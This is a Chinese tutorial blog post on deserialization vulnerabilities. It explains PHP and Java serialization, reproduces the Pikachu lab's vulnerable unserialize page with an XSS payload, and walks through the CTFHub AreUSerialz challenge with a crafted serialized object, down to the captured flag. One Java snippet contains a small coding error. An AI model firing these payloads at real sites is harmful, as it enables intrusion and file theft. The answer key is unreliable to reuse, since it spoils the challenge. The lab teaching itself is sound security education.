web渗透-反序列化漏洞

一、简介

就是把一个对象变成可以传输的字符串,目的就是为了方便传输。假设,我们写了一个class,这个class里面存有一些变量。当这个class被实例化了之后,在使用过程中里面的一些变量值发生了改变。以后在某些时候还会用到这个变量,如果我们让这个dlass一直不销毁,等着下一次要用它的时候再一次被调用的话,浪费系统资源。当我们写一个小型的项目可能没有太大的影响,但是随着项目的壮大,一些小问题被放大了之后就会产生很多麻烦。这个时候php就和我们说,你可以把这个对象序列化了,存成一个字符审,当你要用的时候再放他出来就好了。在我们讲php反序列化的时候,基本都是围绕着serialize(). unserialize()这两个函数。

二、PHP序列化和反序列化

序列化

php 复制代码
#  序列化函数:serialize()

<?php
class  Person {
  var $name="varin";
}
$user1 = new Person();
echo serialize($user1);
?>
php 复制代码
O:对象
6:对象名称长度
Person:对象名称
1:表示有一个值
s:字符串
4:变量名长度
...

  常见的几个魔法函数:
        __construct()当一个对象创建时被调用

        __destruct()当一个对象销毁时被调用

        __toString()当一个对象被当作一个字符串使用

        __sleep() 在对象在被序列化之前运行

        __wakeup将在序列化之后立即被调用

反序列化

php 复制代码
<?php
class  Person {
  var $name="varin";
}
// 序列化
$user1 = new Person();
$user1_ser= serialize($user1);
// 反序列化
$user2 = unserialize($user1_ser);
print_r($user2);
echo "<br>";
echo $user1->name;
?>

三、JAVA序列化和反序列化

使用:

序列化

php 复制代码
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Test {
    public static void main(String[] args) throws IOException {

        // 序列化
        Person person = new Person("varin");
        System.out.println(person);
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./varin.txt"));
        objectOutputStream.writeObject(person);
        objectOutputStream.flush();
        objectOutputStream.close();


    }
}
class Person implements Serializable{

    public Person(){

    }
    private  String name;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public Person(String name) {
        this.name = name;
    }

    @Override
    public String toString() {
        return "Person{" +
                "name='" + name + '\'' +
                '}';
    }
}

反序列化

技巧:若在网站上看见一段数据以r00AB开头,大概率是JAVA序列化Base64加密的数据

或者:是以aced开头,是java序列化的十六进制数据

php 复制代码
import java.io.*;

public class Test {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        //反序列化
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("./varin.txt"));
        Person o =(Person) objectInputStream.readObject();
        objectOutputStream.close();
        System.out.println(o.getName());


    }
}

扩展-java执行系统命令

java 复制代码
import java.io.*;

public class Test {
    public static void main(String[] args) throws IOException, ClassNotFoundException {


        // java执行系统命令
        Process ifconfig = Runtime.getRuntime().exec("ipconfig");
        InputStream inputStream = ifconfig.getInputStream();

        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String s = null;
        while (( s = bufferedReader.readLine()) != null) {
            System.out.println(s);
        }
        bufferedReader.close();



    }
}

四、PHP反序列化漏洞重现

  • 靶场:pikachu
php 复制代码
// 漏洞源码
/*
核心:
以POST方式接收序列化对象o,
接收后并将o对象序列化后赋值给对象$unser,页面打印对象$unser的test属性
*/

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "unser.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR.'header.php';


class S{
    var $test = "pikachu";
    function __construct(){
        echo $this->test;
    }
}

//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";
    }

}
?>
php 复制代码
# 序列化结构:
O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

五、CTF-PHP反序列化漏洞利用

平台:https://www.ctfhub.com/

题目名称:AreUSerialz
思路:

php 复制代码
// 弱类型对比:== (存在漏洞:"2"==" 2" 返回true)
// 强类型对比:=== 


1 git方式提交str参数
2 有unserialize()函数表示需要序列化数据
3 FileHandler类三个变量,5个函数其中两个魔法函数,3个自定义函数
4 魔法函数:__construct()创建 、__destruct()销毁
5 write ()、read()、process()
6 因为代码中并创建对象,所以未使用__construct()函数,只执行__destruct()
7 __destruct()函数中将$content变量中的值清空了,所以write方法无效
8 利用弱类型对比漏洞,进入到read方法
9 因为代码中有文件包含:include("flag.php"),所以尝试读取,$filename="flag.php"
10 构造序列化字符串
php 复制代码
<?php
class FileHandler {
    protected $op=" 2";
    protected $filename="flag.php";
    protected $content="";
}
$o = new FileHandler();
echo serialize($o);
# O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:0:"";}

?>
php 复制代码
# 将序列化字符赋值给str并使用get方法请求网址后,进入到网页的源代码页面
php 复制代码
# flag
$FLAG = "ctfhub{128ad0a5b38aae3ac705237b}"

六、扩展:WebGoat靶场实战(JAVA靶场)

  • github地址:https://github.com/WebGoat/WebGoat/tags
  • 注意:jar包运行环境为:JDK17
  • 启动jar包命令:java -jar webgoat-2023.8.jar
  • 访问网址:[http://127.0.0.1:8080/WebGoat](http://127.0.0.1:8080/WebGoat)
相关推荐
学习溢出4 分钟前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
孤独的履行者3 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全
Blankspace学4 小时前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
CVE-柠檬i8 小时前
Yakit靶场-高级前端加解密与验签实战-全关卡通关教程
网络安全
轨迹H20 小时前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper20 小时前
Vulnhub靶场Apache解析漏洞
网络安全·apache
Autumn.h20 小时前
文件解析漏洞
web安全·网络安全·中间件
Mitch3111 天前
【漏洞复现】CVE-2023-37461 Arbitrary File Writing
web安全·网络安全·prometheus·metersphere·漏洞复现
CVE-柠檬i1 天前
渗透测试-前后端加密分析之RSA+AES
网络安全
TazmiDev1 天前
[极客大挑战 2019]BabySQL 1
服务器·数据库·安全·web安全·网络安全·密码学·安全威胁分析